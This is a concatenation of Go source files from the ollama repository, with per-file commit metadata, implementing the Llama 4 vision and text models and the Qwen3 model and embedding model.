626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/model_vision.go
model/models/llama4/model_vision.go
package llama4 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) type VisionAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } // applyVisionRotaryEmbedding applies 2D rotary embedding to the input tensor. // This is equivalent to the Pytorch implmentation using half rotations: // // cos, sin = torch.cos(freqs), torch.sin(freqs) // cos = cos.unsqueeze(-1) // sin = sin.unsqueeze(-1) // t = t.reshape(*t.shape[:-1], -1, 2) // t_out = (t * cos) + (_rotate_half(t) * sin) // t_out = t_out.flatten(3) // // Which is equivalent to the Pytorch implementation using complex numbers: // // t_ = torch.view_as_complex(t.float().reshape(*t.shape[:-1], -1, 2)) // freqs_ci = reshape_for_broadcast(freqs_ci=freq_cis, t=t_) # freqs_ci[:,:,None,:] // freqs_ci = freqs_ci.to(t_.device) // t_out = torch.view_as_real(t_ * freqs_ci).flatten(3) // // Due to the 1) the dimensional and 2) the datatype limitations of current backends, // we need to use a different approach to achieve the same result. func applyVisionRotaryEmbedding(ctx ml.Context, t, cos, sin ml.Tensor) ml.Tensor { width, height, channels, tiles := t.Dim(0), t.Dim(1), t.Dim(2), t.Dim(3) // t1 = t[..., 0::2] t1 := t.Slice(ctx, 0, 0, t.Dim(0), 2) // t2 = t[..., 1::2] t2 := t.Slice(ctx, 0, 1, t.Dim(0), 2) // cos_out = torch.stack((t1 * cos, t2 * cos), dim=-1) cosOut := t1.Mul(ctx, cos).Concat(ctx, t2.Mul(ctx, cos), 0) cosOut = cosOut.Reshape(ctx, cosOut.Dim(0)/2, 2, -1) cosOut = cosOut.Permute(ctx, 1, 0, 2, 3) cosOut = cosOut.Contiguous(ctx, width, height, channels, tiles) // sin_out = torch.stack((-t2 * sin, t1 * sin), dim=-1) sinOut := t2.Scale(ctx, -1).Mul(ctx, sin).Concat(ctx, t1.Mul(ctx, sin), 0) sinOut = sinOut.Reshape(ctx, sinOut.Dim(0)/2, 2, -1) sinOut = sinOut.Permute(ctx, 1, 0, 2, 3) sinOut = sinOut.Contiguous(ctx, width, height, channels, tiles) return cosOut.Add(ctx, sinOut) } func (sa *VisionAttention) Forward(ctx ml.Context, hiddenState, cos, sin ml.Tensor, opts *VisionOptions) ml.Tensor { headDim := opts.hiddenSize / opts.numHeads query := sa.Query.Forward(ctx, hiddenState) key := sa.Key.Forward(ctx, hiddenState) value := sa.Value.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, query.Dim(1), query.Dim(2)) key = key.Reshape(ctx, headDim, opts.numHeads, key.Dim(1), key.Dim(2)) value = value.Reshape(ctx, headDim, opts.numHeads, value.Dim(1), value.Dim(2)) query = applyVisionRotaryEmbedding(ctx, query, cos, sin) key = applyVisionRotaryEmbedding(ctx, key, cos, sin) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(headDim)), nil) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), attention.Dim(3)) return sa.Output.Forward(ctx, attention) } type VisionMLP struct { FC1 *nn.Linear `gguf:"fc1"` FC2 *nn.Linear `gguf:"fc2"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionOptions) ml.Tensor { hiddenStates = mlp.FC1.Forward(ctx, hiddenStates).GELU(ctx) hiddenStates = mlp.FC2.Forward(ctx, hiddenStates) return hiddenStates } type VisionLayer struct { InputLayerNorm *nn.LayerNorm `gguf:"attn_norm"` *VisionAttention PostAttentionNorm *nn.LayerNorm `gguf:"ffn_norm"` *VisionMLP `gguf:"mlp"` } func (e *VisionLayer) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts *VisionOptions) ml.Tensor { residual := hiddenStates // self attention hiddenStates = e.InputLayerNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.VisionAttention.Forward(ctx, hiddenStates, cos, sin, opts) hiddenStates = hiddenStates.Add(ctx, residual) // MLP residual = hiddenStates hiddenStates = e.PostAttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = e.VisionMLP.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) return hiddenStates } type VisionAdapter struct { FC1 *nn.Linear `gguf:"mlp.fc1"` FC2 *nn.Linear `gguf:"mlp.fc2"` } func (a *VisionAdapter) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionOptions) ml.Tensor { patches := hiddenStates.Dim(1) patchSize := int(math.Sqrt(float64(patches))) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), patchSize, patchSize, hiddenStates.Dim(2)) channels, width, height, tiles := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2), hiddenStates.Dim(3) channels, width = int(float32(channels)/opts.pixelShuffleRatio), int(float32(width)*opts.pixelShuffleRatio) hiddenStates = hiddenStates.Reshape(ctx, channels, width, height, tiles) hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) channels, height = int(float32(channels)/opts.pixelShuffleRatio), int(float32(height)*opts.pixelShuffleRatio) hiddenStates = hiddenStates.Reshape(ctx, channels, width, height, tiles) hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) hiddenStates = hiddenStates.Reshape(ctx, channels, width*height, tiles) hiddenStates = a.FC1.Forward(ctx, hiddenStates).GELU(ctx) hiddenStates = a.FC2.Forward(ctx, hiddenStates).GELU(ctx) return hiddenStates } type VisionOptions struct { hiddenSize, numHeads int imageSize, patchSize int ropeTheta float32 eps float32 pixelShuffleRatio float32 } type PatchEmbedding struct { *nn.Linear } func (p *PatchEmbedding) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionOptions) ml.Tensor { kernel := ctx.Input().Empty(ml.DTypeF32, opts.patchSize, opts.patchSize, hiddenStates.Dim(2)) hiddenStates = kernel.IM2Col(ctx, hiddenStates, opts.patchSize, opts.patchSize, 0, 0, 1, 1) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), hiddenStates.Dim(1)*hiddenStates.Dim(2), hiddenStates.Dim(3)) return p.Linear.Forward(ctx, hiddenStates) } type VisionModel struct { Layers []VisionLayer `gguf:"blk"` *PatchEmbedding `gguf:"patch_embedding"` ClassEmbedding ml.Tensor `gguf:"class_embedding"` PositionalEmbedding ml.Tensor `gguf:"positional_embedding_vlm"` LayerNormPre *nn.LayerNorm `gguf:"layernorm_pre"` LayerNormPost *nn.LayerNorm `gguf:"layernorm_post"` *VisionAdapter `gguf:"vision_adapter"` *VisionOptions } func newVisionModel(c fs.Config) *VisionModel { return &VisionModel{ Layers: make([]VisionLayer, c.Uint("vision.block_count")), VisionOptions: &VisionOptions{ hiddenSize: int(c.Uint("vision.embedding_length")), numHeads: int(c.Uint("vision.attention.head_count")), imageSize: int(c.Uint("vision.image_size")), patchSize: int(c.Uint("vision.patch_size")), ropeTheta: float32(c.Float("vision.rope.freq_base")), eps: c.Float("vision.layer_norm_epsilon"), pixelShuffleRatio: float32(c.Float("vision.pixel_shuffle_ratio")), }, } } func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor) ml.Tensor { hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.VisionOptions) hiddenStates = hiddenStates.Concat(ctx, m.ClassEmbedding.Repeat(ctx, 2, hiddenStates.Dim(2)), 1) hiddenStates = hiddenStates.Add(ctx, m.PositionalEmbedding) hiddenStates = m.LayerNormPre.Forward(ctx, hiddenStates, m.eps) cos, sin := m.rotaryEmbedding(ctx) for _, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, cos, sin, m.VisionOptions) } hiddenStates = m.LayerNormPost.Forward(ctx, hiddenStates, m.eps) hiddenStates = hiddenStates.Pad(ctx, 0, -1, 0, 0) hiddenStates = m.VisionAdapter.Forward(ctx, hiddenStates, m.VisionOptions) return hiddenStates } // floorDiv is a helper function to perform floor division. This mimics PyTorch's div(round_mode='floor') function // which in turn mimics Python's // operator. func floorDiv[T int | int16 | int32 | int64 | uint | uint16 | uint32 | uint64](a, b T) T { if b == 0 { panic("division by zero") } if (a >= 0 && b > 0) || (a <= 0 && b < 0) || a%b == 0 { return a / b } return a/b - 1 } func (m *VisionModel) rotaryEmbedding(ctx ml.Context) (ml.Tensor, ml.Tensor) { patchesPerSide := m.imageSize / m.patchSize numPatches := patchesPerSide*patchesPerSide + 1 headDim := m.hiddenSize / m.numHeads freqDim := headDim / 2 freqs := make([]float32, numPatches*freqDim) for i := range numPatches - 1 { for j := 0; j < freqDim; j += 2 { positionX := i*freqDim/2 + j/2 positionY := (i+numPatches)*freqDim/2 + j/2 ropeFreq := math.Pow(float64(m.ropeTheta), float64(j)*2/float64(headDim)) freqs[positionX] = float32(float64(1+i-floorDiv(i, patchesPerSide)*patchesPerSide) / ropeFreq) freqs[positionY] = float32(float64(1+floorDiv(i, patchesPerSide)) / ropeFreq) } } ropeFreqs := ctx.Input().FromFloats(freqs, freqDim/2, numPatches, 2) ropeFreqs = ropeFreqs.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) ropeFreqs = ropeFreqs.Reshape(ctx, freqDim, 1, numPatches) return ropeFreqs.Cos(ctx), ropeFreqs.Sin(ctx) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama4/model_text.go
model/models/llama4/model_text.go
package llama4 import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model/input" ) type TextAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` RopeFactors ml.Tensor `gguf:"rope_factors"` } func (sa *TextAttention) Forward(ctx ml.Context, hiddenStates, positions, attentionScales ml.Tensor, cache kvcache.Cache, useRope bool, opts *TextOptions) ml.Tensor { batchSize, headDim := hiddenStates.Dim(1), cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads) query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, headDim, opts.numHeads, batchSize) key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize) value = value.Reshape(ctx, headDim, opts.numKVHeads, batchSize) if useRope { query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, sa.RopeFactors) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, sa.RopeFactors) } if opts.useQKNorm { query = query.RMSNorm(ctx, nil, opts.eps) key = key.RMSNorm(ctx, nil, opts.eps) } if attentionScales != nil && !useRope { query = query.Mul(ctx, attentionScales) } attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(headDim)), cache) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return sa.Output.Forward(ctx, attention) } type TextMLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *TextMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type TextExperts struct { Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (e *TextExperts) Forward(ctx ml.Context, hiddenStates, routerLogits ml.Tensor, opts *TextOptions) ml.Tensor { experts := routerLogits.TopK(ctx, opts.numExpertsUsed) scores := routerLogits.Sigmoid(ctx).Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, experts) hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = hiddenStates.Repeat(ctx, 1, opts.numExpertsUsed) hiddenStates = hiddenStates.Mul(ctx, scores) upStates := e.Up.Forward(ctx, hiddenStates, experts) gateStates := e.Gate.Forward(ctx, hiddenStates, experts) downStates := e.Down.Forward(ctx, upStates.Mul(ctx, gateStates.SILU(ctx)), experts) nextStates := downStates.View(ctx, 0, hiddenStates.Dim(0), downStates.Stride(2), hiddenStates.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, downStates.View(ctx, i*downStates.Stride(1), hiddenStates.Dim(0), downStates.Stride(2), hiddenStates.Dim(2))) } return nextStates } type TextMOE struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Experts *TextExperts SharedExpert *TextMLP `gguf:",suf:_shexp"` } func (moe *TextMOE) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := moe.Router.Forward(ctx, hiddenStates) sharedStates := moe.SharedExpert.Forward(ctx, hiddenStates, opts) routedStates := moe.Experts.Forward(ctx, hiddenStates, routerLogits, opts) return sharedStates.Add(ctx, routedStates) } type TextFeedForward interface { Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor } type TextLayer struct { AttentionNorm *nn.LayerNorm `gguf:"attn_norm"` Attention *TextAttention FFNNorm *nn.LayerNorm `gguf:"ffn_norm"` FeedForward TextFeedForward } func (d *TextLayer) Forward(ctx ml.Context, hiddenStates, positions, attentionScales, outputs ml.Tensor, cache kvcache.Cache, useRope bool, opts *TextOptions) ml.Tensor { residual := hiddenStates // self attention hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, attentionScales, cache, useRope, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = d.FFNNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.FeedForward.Forward(ctx, hiddenStates, opts) return residual.Add(ctx, hiddenStates) } type TextOptions struct { hiddenSize int numHeads, numKVHeads, headDim int numExperts, numExpertsUsed int ropeDim int ropeBase, ropeScale float32 eps float32 interleaveLayerStep int noRopeInterval int useQKNorm bool attentionTemperatureTuning bool attentionScale float64 attentionFloorScale float64 } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions, factors ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, rope.WithFactors(factors)) } type TextModel struct { Layers []TextLayer `gguf:"blk"` TokenEmbedding *nn.Embedding `gguf:"token_embd"` OutputNorm *nn.LayerNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *TextOptions } func newTextModel(c fs.Config) *TextModel { layers := make([]TextLayer, c.Uint("block_count")) interleaveLayerStep := c.Uint("interleave_moe_layer_step", 1) for i := range layers { if (i+1)%int(interleaveLayerStep) == 0 { layers[i] = TextLayer{FeedForward: &TextMOE{}} } else { layers[i] = TextLayer{FeedForward: &TextMLP{}} } } return &TextModel{ Layers: layers, TextOptions: &TextOptions{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), headDim: int(c.Uint("attention.head_dim", 128)), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), ropeDim: int(c.Uint("rope.dimension_count")), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), eps: c.Float("attention.layer_norm_rms_epsilon"), interleaveLayerStep: int(c.Uint("interleave_moe_layer_step", 1)), noRopeInterval: int(c.Uint("no_rope_interval", 4)), useQKNorm: c.Bool("use_qk_norm", true), attentionTemperatureTuning: c.Bool("attention.temperature_tuning", true), attentionScale: float64(c.Float("attention.scale", 0.1)), attentionFloorScale: float64(c.Float("attention.floor_scale", 8192)), }, } } func (m *TextModel) Forward(ctx ml.Context, inputs, positions, outputs ml.Tensor, batch input.Batch, cache kvcache.Cache) ml.Tensor { hiddenStates := m.TokenEmbedding.Forward(ctx, inputs).Duplicate(ctx) for _, mi := range batch.Multimodal { img := mi.Multimodal[0].Tensor ctx.Forward(img.Copy(ctx, hiddenStates.View(ctx, mi.Index*hiddenStates.Stride(1), img.Dim(0)*img.Dim(1)))) } var attentionScales ml.Tensor if m.attentionTemperatureTuning { scales := make([]float32, len(batch.Positions)) for i, p := range batch.Positions { scales[i] = float32(math.Log(math.Floor(((float64(p)+1.0)/float64(m.attentionFloorScale))+1.0))*m.attentionScale + 1.0) } attentionScales = ctx.Input().FromFloats(scales, 1, 1, len(scales)) } for i, layer := range m.Layers { cache.SetLayer(i) wc := cache.(*kvcache.WrapperCache) wc.SetLayerType(1) useChunkedAttention := (i+1)%m.noRopeInterval != 0 if useChunkedAttention { wc.SetLayerType(0) } var lastLayerOutputs ml.Tensor if i == len(m.Layers)-1 { lastLayerOutputs = outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, attentionScales, lastLayerOutputs, cache, useChunkedAttention, m.TextOptions) } hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates) } func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift, m.Layers[layer].Attention.RopeFactors), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3/embed.go
model/models/qwen3/embed.go
package qwen3 import ( "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type embedModel struct { model.Base model.BytePairEncoding *Model poolingType pooling.Type } func (m *embedModel) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates, err := m.forward(ctx, batch) if err != nil { return nil, err } hiddenStates = m.poolingType.Forward(ctx, hiddenStates) hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) return hiddenStates, nil } func newEmbed(c fs.Config) (model.Model, error) { layers := make([]Layer, c.Uint("block_count")) for i := range layers { layers[i].MLP = &dense{} } m := embedModel{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), Model: &Model{ Layers: layers, Options: &Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.freq_scale", 1), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("norm_top_k_prob", true), }, }, poolingType: pooling.Type(c.Uint("pooling_type")), } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/qwen3/model.go
model/models/qwen3/model.go
package qwen3 import ( "cmp" "math" "strings" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength int eps, ropeBase, ropeScale float32 ropeType string originalContextLength int numExperts, numExpertsUsed int normTopKProb bool } func (o Options) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { opts := []func(*rope.Options){rope.WithTypeNeoX()} if o.ropeType == "yarn" { attnFactor := float32(1.0 / (1.0 + 0.1*math.Log(float64(o.ropeScale)))) opts = append(opts, rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(1.), rope.WithAttentionFactor(attnFactor), ) } return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1./o.ropeScale, opts...) } type Attention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) query := sa.Query.Forward(ctx, hiddenStates) key := sa.Key.Forward(ctx, hiddenStates) value := sa.Value.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) query = sa.QueryNorm.Forward(ctx, query, opts.eps) key = sa.KeyNorm.Forward(ctx, key, opts.eps) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return sa.Output.Forward(ctx, attention) } type MLP interface { Forward(ml.Context, ml.Tensor, *Options) ml.Tensor } type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` } func (mlp *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenDim, sequenceLength, batchSize := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) hiddenStates = hiddenStates.Reshape(ctx, hiddenDim, sequenceLength*batchSize) routerLogits := mlp.Router.Forward(ctx, hiddenStates) routingWeights := routerLogits.Softmax(ctx) selectedExperts := routingWeights.TopK(ctx, opts.numExpertsUsed) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, selectedExperts) if opts.normTopKProb { routingWeights = routingWeights.Reshape(ctx, opts.numExpertsUsed, hiddenStates.Dim(1)) routingWeights = routingWeights.Div(ctx, routingWeights.SumRows(ctx)) routingWeights = routingWeights.Reshape(ctx, 1, opts.numExpertsUsed, hiddenStates.Dim(1)) } hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) hiddenStates = mlp.Gate.Forward(ctx, hiddenStates, selectedExperts).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates, selectedExperts)) experts := mlp.Down.Forward(ctx, hiddenStates, selectedExperts) experts = experts.Mul(ctx, routingWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ *Options) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates). SILU(ctx, mlp.Up.Forward(ctx, hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` *Attention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP } func (d *Layer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenStates hiddenStates = d.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = d.MLPNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = d.MLP.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type Model struct { model.Base model.BytePairEncoding TokenEmbedding *nn.Embedding `gguf:"token_embd"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Layers []Layer `gguf:"blk"` *Options } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates, err := m.forward(ctx, batch) if err != nil { return nil, err } return m.Output.Forward(ctx, hiddenStates), nil } // Forward implements model.Model. func (m *Model) forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { if m.Cache != nil { m.Cache.SetLayer(i) } var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options) } return m.OutputNorm.Forward(ctx, hiddenStates, m.eps), nil } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.Options.applyRotaryPositionEmbeddings(ctx, key, shift), nil } var _ model.Model = (*Model)(nil) func New(c fs.Config) (model.Model, error) { layers := make([]Layer, c.Uint("block_count")) for i := range layers { if strings.HasSuffix(c.String("general.architecture"), "moe") { layers[i].MLP = &sparse{} } else { layers[i].MLP = &dense{} } } m := Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), Layers: layers, Options: &Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeType: c.String("rope.scaling.type"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("norm_top_k_prob", true), }, } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil } func init() { model.Register("qwen3", New) model.Register("qwen3moe", New) model.Register("qwen3_embed", newEmbed) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma2/model.go
model/models/gemma2/model.go
